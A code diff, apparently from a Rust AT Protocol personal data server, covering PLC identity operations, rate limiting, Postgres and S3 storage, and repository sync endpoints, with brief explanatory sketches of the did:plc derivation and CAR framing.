        let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did));
        let response = self.client.get(&url).send().await?;
···
        }
        response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
    }
+
    pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> {
        let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did));
        let response = self.client.get(&url).send().await?;
···
        }
        response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
    }
+
    pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> {
        let url = format!("{}/{}", self.base_url, Self::encode_did(did));
        let response = self.client
···
        Ok(())
    }
}
+
pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> {
    let cbor_bytes = serde_ipld_dagcbor::to_vec(value)
        .map_err(|e| PlcError::Serialization(e.to_string()))?;
···
    let cid = cid::Cid::new_v1(0x71, multihash);
    Ok(cid.to_string())
}
+
pub fn sign_operation(
    operation: &Value,
    signing_key: &SigningKey,
···
    }
    Ok(op)
}
+
pub fn create_update_op(
    last_op: &PlcOpOrTombstone,
    rotation_keys: Option<Vec<String>>,
···
    };
    serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string()))
}
+
pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
    let verifying_key = signing_key.verifying_key();
    let point = verifying_key.to_encoded_point(true);
···
    let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
    format!("did:key:{}", encoded)
}
+
pub struct GenesisResult {
    pub did: String,
    pub signed_operation: Value,
}
+
pub fn create_genesis_operation(
    signing_key: &SigningKey,
    rotation_key: &str,
···
        signed_operation: signed_op,
    })
}
+
pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> {
    let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op)
        .map_err(|e| PlcError::Serialization(e.to_string()))?;
···
    let truncated = &encoded[..24];
    Ok(format!("did:plc:{}", truncated))
}
+
pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
    let obj = op.as_object()
        .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
···
    }
    Ok(())
}
+
pub struct PlcValidationContext {
    pub server_rotation_key: String,
    pub expected_signing_key: String,
    pub expected_handle: String,
    pub expected_pds_endpoint: String,
}
+
pub fn validate_plc_operation_for_submission(
    op: &Value,
    ctx: &PlcValidationContext,
···
    }
    Ok(())
}
+
pub fn verify_operation_signature(
    op: &Value,
    rotation_keys: &[String],
···
    }
    Ok(false)
}
+
fn verify_signature_with_did_key(
    did_key: &str,
    message: &[u8],
···
        .map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
    Ok(verifying_key.verify(message, signature).is_ok())
}
+
#[cfg(test)]
mod tests {
    use super::*;
+
    #[test]
    fn test_signing_key_to_did_key() {
        let key = SigningKey::random(&mut rand::thread_rng());
        let did_key = signing_key_to_did_key(&key);
        assert!(did_key.starts_with("did:key:z"));
    }
+
    #[test]
    fn test_cid_for_cbor() {
        let value = json!({
···
        let cid = cid_for_cbor(&value).unwrap();
        assert!(cid.starts_with("bafyrei"));
    }
+
    #[test]
    fn test_sign_operation() {
        let key = SigningKey::random(&mut rand::thread_rng());
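`did_for_genesis_op` encodes the did:plc derivation rule: SHA-256 over the DAG-CBOR bytes of the signed genesis operation, base32-encoded (lowercase, unpadded), truncated to 24 characters. A sketch using the `data_encoding` crate purely for illustration; the base32 helper actually used in the elided body above is not shown in this diff:

```rust
use data_encoding::BASE32_NOPAD;
use sha2::{Digest, Sha256};

// did:plc = "did:plc:" + first 24 chars of lowercase, unpadded base32(SHA256(genesis CBOR)).
fn did_from_genesis_cbor(cbor_bytes: &[u8]) -> String {
    let digest = Sha256::digest(cbor_bytes);
    let encoded = BASE32_NOPAD.encode(&digest).to_lowercase();
    format!("did:plc:{}", &encoded[..24])
}
```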
+34 -5 src/rate_limit.rs
···
    num::NonZeroU32,
    sync::Arc,
};
+
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
-// NOTE: For production deployments with high traffic, prefer using the distributed rate
-// limiter (Redis/Valkey-based) via AppState::distributed_rate_limiter. The in-memory
-// rate limiters here don't automatically clean up expired entries, which can cause
-// memory growth over time with many unique client IPs. The distributed rate limiter
-// uses Redis TTL for automatic cleanup and works correctly across multiple instances.
+
#[derive(Clone)]
pub struct RateLimiters {
    pub login: Arc<KeyedRateLimiter>,
···
    pub app_password: Arc<KeyedRateLimiter>,
    pub email_update: Arc<KeyedRateLimiter>,
}
+
impl Default for RateLimiters {
    fn default() -> Self {
        Self::new()
    }
}
+
impl RateLimiters {
    pub fn new() -> Self {
        Self {
···
            )),
        }
    }
+
    pub fn with_login_limit(mut self, per_minute: u32) -> Self {
        self.login = Arc::new(RateLimiter::keyed(
            Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
        ));
        self
    }
+
    pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
        self.oauth_token = Arc::new(RateLimiter::keyed(
            Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
        ));
        self
    }
+
    pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self {
        self.oauth_authorize = Arc::new(RateLimiter::keyed(
            Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
        ));
        self
    }
+
    pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
        self.password_reset = Arc::new(RateLimiter::keyed(
            Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
        ));
        self
    }
+
    pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
        self.account_creation = Arc::new(RateLimiter::keyed(
            Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
        ));
        self
    }
+
    pub fn with_email_update_limit(mut self, per_hour: u32) -> Self {
        self.email_update = Arc::new(RateLimiter::keyed(
            Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
···
        self
    }
}
+
120
126
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
121
127
if let Some(forwarded) = headers.get("x-forwarded-for") {
122
128
if let Ok(value) = forwarded.to_str() {
···
125
131
}
126
132
}
127
133
}
134
+
128
135
if let Some(real_ip) = headers.get("x-real-ip") {
129
136
if let Ok(value) = real_ip.to_str() {
130
137
return value.trim().to_string();
131
138
}
132
139
}
140
+
133
141
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
134
142
}
143
+
135
144
fn rate_limit_response() -> Response {
136
145
(
137
146
StatusCode::TOO_MANY_REQUESTS,
···
142
151
)
143
152
.into_response()
144
153
}
154
+
145
155
pub async fn login_rate_limit(
146
156
ConnectInfo(addr): ConnectInfo<SocketAddr>,
147
157
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
149
159
next: Next,
150
160
) -> Response {
151
161
let client_ip = extract_client_ip(request.headers(), Some(addr));
162
+
152
163
if limiters.login.check_key(&client_ip).is_err() {
153
164
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
154
165
return rate_limit_response();
155
166
}
167
+
156
168
next.run(request).await
157
169
}
170
+
158
171
pub async fn oauth_token_rate_limit(
159
172
ConnectInfo(addr): ConnectInfo<SocketAddr>,
160
173
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
162
175
next: Next,
163
176
) -> Response {
164
177
let client_ip = extract_client_ip(request.headers(), Some(addr));
178
+
165
179
if limiters.oauth_token.check_key(&client_ip).is_err() {
166
180
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
167
181
return rate_limit_response();
168
182
}
183
+
169
184
next.run(request).await
170
185
}
186
+
171
187
pub async fn password_reset_rate_limit(
172
188
ConnectInfo(addr): ConnectInfo<SocketAddr>,
173
189
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
175
191
next: Next,
176
192
) -> Response {
177
193
let client_ip = extract_client_ip(request.headers(), Some(addr));
194
+
178
195
if limiters.password_reset.check_key(&client_ip).is_err() {
179
196
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
180
197
return rate_limit_response();
181
198
}
199
+
182
200
next.run(request).await
183
201
}
202
+
184
203
pub async fn account_creation_rate_limit(
185
204
ConnectInfo(addr): ConnectInfo<SocketAddr>,
186
205
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
188
207
next: Next,
189
208
) -> Response {
190
209
let client_ip = extract_client_ip(request.headers(), Some(addr));
210
+
191
211
if limiters.account_creation.check_key(&client_ip).is_err() {
192
212
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
193
213
return rate_limit_response();
194
214
}
215
+
195
216
next.run(request).await
196
217
}
218
+
197
219
#[cfg(test)]
198
220
mod tests {
199
221
use super::*;
222
+
200
223
#[test]
201
224
fn test_rate_limiters_creation() {
202
225
let limiters = RateLimiters::new();
203
226
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
204
227
}
228
+
205
229
#[test]
206
230
fn test_rate_limiter_exhaustion() {
207
231
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
208
232
let key = "test_ip".to_string();
233
+
209
234
assert!(limiter.check_key(&key).is_ok());
210
235
assert!(limiter.check_key(&key).is_ok());
211
236
assert!(limiter.check_key(&key).is_err());
212
237
}
238
+
213
239
#[test]
214
240
fn test_different_keys_have_separate_limits() {
215
241
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
242
+
216
243
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
217
244
assert!(limiter.check_key(&"ip1".to_string()).is_err());
218
245
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
219
246
}
247
+
220
248
#[test]
221
249
fn test_builder_pattern() {
222
250
let limiters = RateLimiters::new()
···
224
252
.with_oauth_token_limit(60)
225
253
.with_password_reset_limit(3)
226
254
.with_account_creation_limit(5);
255
+
227
256
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
228
257
}
229
258
}
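The builder methods above override individual quotas while leaving the rest at their defaults. A minimal sketch of how they might be wired together at startup; the RATE_LIMIT_LOGIN_PER_MIN variable and the helper name are illustrative, not taken from this diff:

use std::sync::Arc;

// Hypothetical startup wiring: read one override from the environment and
// fall back to the defaults baked into RateLimiters::new().
fn build_rate_limiters() -> Arc<RateLimiters> {
    let login_per_minute: u32 = std::env::var("RATE_LIMIT_LOGIN_PER_MIN") // illustrative name
        .ok()
        .and_then(|v| v.parse().ok())
        .unwrap_or(10);
    Arc::new(
        RateLimiters::new()
            .with_login_limit(login_per_minute)
            .with_password_reset_limit(5)
            .with_account_creation_limit(10),
    )
}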
+9 src/repo/mod.rs
···
6
6
use multihash::Multihash;
7
7
use sha2::{Digest, Sha256};
8
8
use sqlx::PgPool;
9
+
9
10
pub mod tracking;
11
+
10
12
#[derive(Clone)]
11
13
pub struct PostgresBlockStore {
12
14
pool: PgPool,
13
15
}
16
+
14
17
impl PostgresBlockStore {
15
18
pub fn new(pool: PgPool) -> Self {
16
19
Self { pool }
17
20
}
18
21
}
22
+
19
23
impl BlockStore for PostgresBlockStore {
20
24
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
21
25
crate::metrics::record_block_operation("get");
···
29
33
None => Ok(None),
30
34
}
31
35
}
36
+
32
37
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
33
38
crate::metrics::record_block_operation("put");
34
39
let mut hasher = Sha256::new();
···
44
49
.map_err(|e| RepoError::storage(e))?;
45
50
Ok(cid)
46
51
}
52
+
47
53
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
48
54
crate::metrics::record_block_operation("has");
49
55
let cid_bytes = cid.to_bytes();
···
53
59
.map_err(|e| RepoError::storage(e))?;
54
60
Ok(row.is_some())
55
61
}
62
+
56
63
async fn put_many(
57
64
&self,
58
65
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
78
85
.map_err(|e| RepoError::storage(e))?;
79
86
Ok(())
80
87
}
88
+
81
89
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
82
90
if cids.is_empty() {
83
91
return Ok(Vec::new());
···
101
109
.collect();
102
110
Ok(results)
103
111
}
112
+
104
113
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
105
114
self.put_many(commit.blocks).await?;
106
115
Ok(())
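put derives the block's CID from a SHA-256 of the raw bytes before inserting it. A sketch of that derivation, assuming the sha2-256 (0x12) and dag-cbor (0x71) codes used elsewhere in this diff; the helper name is illustrative:

use cid::Cid;
use multihash::Multihash;
use sha2::{Digest, Sha256};

// Sketch: hash the block and wrap the digest into a CIDv1, mirroring
// what PostgresBlockStore::put does before the INSERT.
fn cid_for_block(data: &[u8]) -> Cid {
    let mut hasher = Sha256::new();
    hasher.update(data);
    let hash = hasher.finalize();
    let mh = Multihash::wrap(0x12, &hash).expect("sha2-256 digest fits"); // 0x12 = sha2-256
    Cid::new_v1(0x71, mh) // 0x71 = dag-cbor
}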
+11 src/repo/tracking.rs
···
6
6
use jacquard_repo::storage::BlockStore;
7
7
use std::collections::HashSet;
8
8
use std::sync::{Arc, Mutex};
9
+
9
10
#[derive(Clone)]
10
11
pub struct TrackingBlockStore {
11
12
inner: PostgresBlockStore,
12
13
written_cids: Arc<Mutex<Vec<Cid>>>,
13
14
read_cids: Arc<Mutex<HashSet<Cid>>>,
14
15
}
16
+
15
17
impl TrackingBlockStore {
16
18
pub fn new(store: PostgresBlockStore) -> Self {
17
19
Self {
···
20
22
read_cids: Arc::new(Mutex::new(HashSet::new())),
21
23
}
22
24
}
25
+
23
26
pub fn get_written_cids(&self) -> Vec<Cid> {
24
27
match self.written_cids.lock() {
25
28
Ok(guard) => guard.clone(),
26
29
Err(poisoned) => poisoned.into_inner().clone(),
27
30
}
28
31
}
32
+
29
33
pub fn get_read_cids(&self) -> Vec<Cid> {
30
34
match self.read_cids.lock() {
31
35
Ok(guard) => guard.iter().cloned().collect(),
32
36
Err(poisoned) => poisoned.into_inner().iter().cloned().collect(),
33
37
}
34
38
}
39
+
35
40
pub fn get_all_relevant_cids(&self) -> Vec<Cid> {
36
41
let written = self.get_written_cids();
37
42
let read = self.get_read_cids();
···
40
45
all.into_iter().collect()
41
46
}
42
47
}
48
+
43
49
impl BlockStore for TrackingBlockStore {
44
50
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
45
51
let result = self.inner.get(cid).await?;
···
51
57
}
52
58
Ok(result)
53
59
}
60
+
54
61
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
55
62
let cid = self.inner.put(data).await?;
56
63
match self.written_cids.lock() {
···
59
66
}
60
67
Ok(cid)
61
68
}
69
+
62
70
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
63
71
self.inner.has(cid).await
64
72
}
73
+
65
74
async fn put_many(
66
75
&self,
67
76
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
75
84
}
76
85
Ok(())
77
86
}
87
+
78
88
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
79
89
let results = self.inner.get_many(cids).await?;
80
90
for (cid, result) in cids.iter().zip(results.iter()) {
···
87
97
}
88
98
Ok(results)
89
99
}
100
+
90
101
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
91
102
self.put_many(commit.blocks).await?;
92
103
Ok(())
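A hypothetical usage sketch: wrap the Postgres store for the duration of one operation, then collect every CID it read or wrote. The helper function is illustrative, not part of this diff:

use jacquard_repo::storage::BlockStore;

// Sketch: the tracking wrapper records CIDs as a side effect of normal
// BlockStore calls, so callers only have to ask for them afterwards.
async fn collect_touched_cids(store: PostgresBlockStore) -> Result<Vec<cid::Cid>, RepoError> {
    let tracking = TrackingBlockStore::new(store);
    let cid = tracking.put(b"example block").await?;
    let _ = tracking.get(&cid).await?;
    Ok(tracking.get_all_relevant_cids())
}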
+16 src/state.rs
···
8
8
use sqlx::PgPool;
9
9
use std::sync::Arc;
10
10
use tokio::sync::broadcast;
11
+
11
12
#[derive(Clone)]
12
13
pub struct AppState {
13
14
pub db: PgPool,
···
19
20
pub cache: Arc<dyn Cache>,
20
21
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
21
22
}
23
+
22
24
pub enum RateLimitKind {
23
25
Login,
24
26
AccountCreation,
···
32
34
AppPassword,
33
35
EmailUpdate,
34
36
}
37
+
35
38
impl RateLimitKind {
36
39
fn key_prefix(&self) -> &'static str {
37
40
match self {
···
48
51
Self::EmailUpdate => "email_update",
49
52
}
50
53
}
54
+
51
55
fn limit_and_window_ms(&self) -> (u32, u64) {
52
56
match self {
53
57
Self::Login => (10, 60_000),
···
64
68
}
65
69
}
66
70
}
71
+
67
72
impl AppState {
68
73
pub async fn new(db: PgPool) -> Self {
69
74
AuthConfig::init();
75
+
70
76
let block_store = PostgresBlockStore::new(db.clone());
71
77
let blob_store = S3BlobStorage::new().await;
78
+
72
79
let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE")
73
80
.ok()
74
81
.and_then(|v| v.parse().ok())
75
82
.unwrap_or(10000);
83
+
76
84
let (firehose_tx, _) = broadcast::channel(firehose_buffer_size);
77
85
let rate_limiters = Arc::new(RateLimiters::new());
78
86
let circuit_breakers = Arc::new(CircuitBreakers::new());
79
87
let (cache, distributed_rate_limiter) = create_cache().await;
88
+
80
89
Self {
81
90
db,
82
91
block_store,
···
88
97
distributed_rate_limiter,
89
98
}
90
99
}
100
+
91
101
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
92
102
self.rate_limiters = Arc::new(rate_limiters);
93
103
self
94
104
}
105
+
95
106
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
96
107
self.circuit_breakers = Arc::new(circuit_breakers);
97
108
self
98
109
}
110
+
99
111
pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool {
100
112
if std::env::var("DISABLE_RATE_LIMITING").is_ok() {
101
113
return true;
102
114
}
115
+
103
116
let key = format!("{}:{}", kind.key_prefix(), client_ip);
104
117
let limiter_name = kind.key_prefix();
105
118
let (limit, window_ms) = kind.limit_and_window_ms();
119
+
106
120
if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await {
107
121
crate::metrics::record_rate_limit_rejection(limiter_name);
108
122
return false;
109
123
}
124
+
110
125
let limiter = match kind {
111
126
RateLimitKind::Login => &self.rate_limiters.login,
112
127
RateLimitKind::AccountCreation => &self.rate_limiters.account_creation,
···
120
135
RateLimitKind::AppPassword => &self.rate_limiters.app_password,
121
136
RateLimitKind::EmailUpdate => &self.rate_limiters.email_update,
122
137
};
138
+
123
139
let ok = limiter.check_key(&client_ip.to_string()).is_ok();
124
140
if !ok {
125
141
crate::metrics::record_rate_limit_rejection(limiter_name);
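A sketch of how a handler might call this, assuming the axum types used elsewhere in the diff; the handler itself is hypothetical:

use axum::http::{HeaderMap, StatusCode};

// Sketch: resolve the client IP, then run the combined distributed +
// in-memory check before doing any real work.
async fn guard_login(state: &AppState, headers: &HeaderMap) -> Result<(), StatusCode> {
    let ip = crate::rate_limit::extract_client_ip(headers, None);
    if !state.check_rate_limit(RateLimitKind::Login, &ip).await {
        return Err(StatusCode::TOO_MANY_REQUESTS);
    }
    Ok(())
}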
+19 -1 src/storage/mod.rs
···
5
5
use aws_sdk_s3::primitives::ByteStream;
6
6
use bytes::Bytes;
7
7
use thiserror::Error;
8
+
8
9
#[derive(Error, Debug)]
9
10
pub enum StorageError {
10
11
#[error("IO error: {0}")]
···
14
15
#[error("Other: {0}")]
15
16
Other(String),
16
17
}
18
+
17
19
#[async_trait]
18
20
pub trait BlobStorage: Send + Sync {
19
21
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>;
···
22
24
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>;
23
25
async fn delete(&self, key: &str) -> Result<(), StorageError>;
24
26
}
27
+
25
28
pub struct S3BlobStorage {
26
29
client: Client,
27
30
bucket: String,
28
31
}
32
+
29
33
impl S3BlobStorage {
30
34
pub async fn new() -> Self {
-// heheheh
32
35
let region_provider = RegionProviderChain::default_provider().or_else("us-east-1");
36
+
33
37
let config = aws_config::defaults(BehaviorVersion::latest())
34
38
.region(region_provider)
35
39
.load()
36
40
.await;
41
+
37
42
let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set");
43
+
38
44
let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") {
39
45
let s3_config = aws_sdk_s3::config::Builder::from(&config)
40
46
.endpoint_url(endpoint)
···
44
50
} else {
45
51
Client::new(&config)
46
52
};
53
+
47
54
Self { client, bucket }
48
55
}
49
56
}
57
+
50
58
#[async_trait]
51
59
impl BlobStorage for S3BlobStorage {
52
60
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> {
53
61
self.put_bytes(key, Bytes::copy_from_slice(data)).await
54
62
}
63
+
55
64
async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> {
56
65
let result = self.client
57
66
.put_object()
···
61
70
.send()
62
71
.await
63
72
.map_err(|e| StorageError::S3(e.to_string()));
73
+
64
74
match &result {
65
75
Ok(_) => crate::metrics::record_s3_operation("put", "success"),
66
76
Err(_) => crate::metrics::record_s3_operation("put", "error"),
67
77
}
78
+
68
79
result?;
69
80
Ok(())
70
81
}
82
+
71
83
async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> {
72
84
self.get_bytes(key).await.map(|b| b.to_vec())
73
85
}
86
+
74
87
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> {
75
88
let resp = self
76
89
.client
···
83
96
crate::metrics::record_s3_operation("get", "error");
84
97
StorageError::S3(e.to_string())
85
98
})?;
99
+
86
100
let data = resp
87
101
.body
88
102
.collect()
···
92
106
StorageError::S3(e.to_string())
93
107
})?
94
108
.into_bytes();
109
+
95
110
crate::metrics::record_s3_operation("get", "success");
96
111
Ok(data)
97
112
}
113
+
98
114
async fn delete(&self, key: &str) -> Result<(), StorageError> {
99
115
let result = self.client
100
116
.delete_object()
···
103
119
.send()
104
120
.await
105
121
.map_err(|e| StorageError::S3(e.to_string()));
122
+
106
123
match &result {
107
124
Ok(_) => crate::metrics::record_s3_operation("delete", "success"),
108
125
Err(_) => crate::metrics::record_s3_operation("delete", "error"),
109
126
}
127
+
110
128
result?;
111
129
Ok(())
112
130
}
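A sketch of the trait in use, assuming S3_BUCKET (and, for MinIO-style setups, S3_ENDPOINT) are set as new() requires; the key is illustrative:

// Sketch: put/get/delete round trip through the BlobStorage trait.
async fn blob_round_trip() -> Result<(), StorageError> {
    let storage = S3BlobStorage::new().await; // panics if S3_BUCKET is unset
    storage.put("blobs/example-key", b"hello").await?;
    let bytes = storage.get_bytes("blobs/example-key").await?;
    assert_eq!(bytes.as_ref(), &b"hello"[..]);
    storage.delete("blobs/example-key").await?;
    Ok(())
}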
+5 src/sync/blob.rs
···
10
10
use serde::{Deserialize, Serialize};
11
11
use serde_json::json;
12
12
use tracing::error;
13
+
13
14
#[derive(Deserialize)]
14
15
pub struct GetBlobParams {
15
16
pub did: String,
16
17
pub cid: String,
17
18
}
19
+
18
20
pub async fn get_blob(
19
21
State(state): State<AppState>,
20
22
Query(params): Query<GetBlobParams>,
···
94
96
}
95
97
}
96
98
}
99
+
97
100
#[derive(Deserialize)]
98
101
pub struct ListBlobsParams {
99
102
pub did: String,
···
101
104
pub limit: Option<i64>,
102
105
pub cursor: Option<String>,
103
106
}
107
+
104
108
#[derive(Serialize)]
105
109
pub struct ListBlobsOutput {
106
110
pub cursor: Option<String>,
107
111
pub cids: Vec<String>,
108
112
}
113
+
109
114
pub async fn list_blobs(
110
115
State(state): State<AppState>,
111
116
Query(params): Query<ListBlobsParams>,
+3 src/sync/car.rs
···
use cid::Cid;
use iroh_car::CarHeader;
use std::io::Write;
+
pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> {
    loop {
        let mut byte = (value & 0x7F) as u8;
···
    }
    Ok(())
}
+
pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> {
    write_varint(&mut writer, data.len() as u64)?;
    writer.write_all(data)?;
    Ok(())
}
+
pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> {
    let header = CarHeader::new_v1(vec![root_cid.clone()]);
    let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
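Each CAR section is length-delimited: an unsigned varint of the payload size followed by the payload itself, which is what ld_write emits. A small sketch of that framing; the helper is illustrative:

// Sketch: frame one payload the way ld_write does. For a 3-byte payload
// the length prefix is the single byte 0x03.
fn frame_section(payload: &[u8]) -> std::io::Result<Vec<u8>> {
    let mut out = Vec::new();
    ld_write(&mut out, payload)?;
    Ok(out)
}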
+11 src/sync/commit.rs
···
12
12
use serde_json::json;
13
13
use std::str::FromStr;
14
14
use tracing::error;
15
+
15
16
async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> {
16
17
let cid = Cid::from_str(cid_str).ok()?;
17
18
let block = state.block_store.get(&cid).await.ok()??;
18
19
let commit = Commit::from_cbor(&block).ok()?;
19
20
Some(commit.rev().to_string())
20
21
}
22
+
21
23
#[derive(Deserialize)]
22
24
pub struct GetLatestCommitParams {
23
25
pub did: String,
24
26
}
27
+
25
28
#[derive(Serialize)]
26
29
pub struct GetLatestCommitOutput {
27
30
pub cid: String,
28
31
pub rev: String,
29
32
}
33
+
30
34
pub async fn get_latest_commit(
31
35
State(state): State<AppState>,
32
36
Query(params): Query<GetLatestCommitParams>,
···
78
82
}
79
83
}
80
84
}
85
+
81
86
#[derive(Deserialize)]
82
87
pub struct ListReposParams {
83
88
pub limit: Option<i64>,
84
89
pub cursor: Option<String>,
85
90
}
91
+
86
92
#[derive(Serialize)]
87
93
#[serde(rename_all = "camelCase")]
88
94
pub struct RepoInfo {
···
91
97
pub rev: String,
92
98
pub active: bool,
93
99
}
100
+
94
101
#[derive(Serialize)]
95
102
pub struct ListReposOutput {
96
103
pub cursor: Option<String>,
97
104
pub repos: Vec<RepoInfo>,
98
105
}
106
+
99
107
pub async fn list_repos(
100
108
State(state): State<AppState>,
101
109
Query(params): Query<ListReposParams>,
···
154
162
}
155
163
}
156
164
}
165
+
157
166
#[derive(Deserialize)]
158
167
pub struct GetRepoStatusParams {
159
168
pub did: String,
160
169
}
170
+
161
171
#[derive(Serialize)]
162
172
pub struct GetRepoStatusOutput {
163
173
pub did: String,
164
174
pub active: bool,
165
175
pub rev: Option<String>,
166
176
}
177
+
167
178
pub async fn get_repo_status(
168
179
State(state): State<AppState>,
169
180
Query(params): Query<GetRepoStatusParams>,
+4 src/sync/crawl.rs
···
8
8
use serde::Deserialize;
9
9
use serde_json::json;
10
10
use tracing::info;
11
+
11
12
#[derive(Deserialize)]
12
13
pub struct NotifyOfUpdateParams {
13
14
pub hostname: String,
14
15
}
16
+
15
17
pub async fn notify_of_update(
16
18
State(_state): State<AppState>,
17
19
Query(params): Query<NotifyOfUpdateParams>,
···
19
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
20
22
(StatusCode::OK, Json(json!({}))).into_response()
21
23
}
24
+
22
25
#[derive(Deserialize)]
23
26
pub struct RequestCrawlInput {
24
27
pub hostname: String,
25
28
}
29
+
26
30
pub async fn request_crawl(
27
31
State(_state): State<AppState>,
28
32
Json(input): Json<RequestCrawlInput>,
+7 src/sync/deprecated.rs
···
14
14
use std::io::Write;
15
15
use std::str::FromStr;
16
16
use tracing::error;
17
+
17
18
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
18
20
#[derive(Deserialize)]
19
21
pub struct GetHeadParams {
20
22
pub did: String,
21
23
}
24
+
22
25
#[derive(Serialize)]
23
26
pub struct GetHeadOutput {
24
27
pub root: String,
25
28
}
29
+
26
30
pub async fn get_head(
27
31
State(state): State<AppState>,
28
32
Query(params): Query<GetHeadParams>,
···
63
67
}
64
68
}
65
69
}
70
+
66
71
#[derive(Deserialize)]
67
72
pub struct GetCheckoutParams {
68
73
pub did: String,
69
74
}
75
+
70
76
pub async fn get_checkout(
71
77
State(state): State<AppState>,
72
78
Query(params): Query<GetCheckoutParams>,
···
168
174
)
169
175
.into_response()
170
176
}
177
+
171
178
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
172
179
match value {
173
180
Ipld::Link(cid) => {
+1 src/sync/firehose.rs
+13 src/sync/frame.rs
···
2
2
use serde::{Deserialize, Serialize};
3
3
use std::str::FromStr;
4
4
use crate::sync::firehose::SequencedEvent;
5
+
5
6
#[derive(Debug, Serialize, Deserialize)]
6
7
pub struct FrameHeader {
7
8
pub op: i64,
8
9
pub t: String,
9
10
}
11
+
10
12
#[derive(Debug, Serialize, Deserialize)]
11
13
pub struct CommitFrame {
12
14
pub seq: i64,
···
25
27
#[serde(rename = "prevData", skip_serializing_if = "Option::is_none")]
26
28
pub prev_data: Option<Cid>,
27
29
}
30
+
28
31
#[derive(Debug, Clone, Serialize, Deserialize)]
29
32
struct JsonRepoOp {
30
33
action: String,
···
32
35
cid: Option<String>,
33
36
prev: Option<String>,
34
37
}
38
+
35
39
#[derive(Debug, Serialize, Deserialize)]
36
40
pub struct RepoOp {
37
41
pub action: String,
···
40
44
#[serde(skip_serializing_if = "Option::is_none")]
41
45
pub prev: Option<Cid>,
42
46
}
47
+
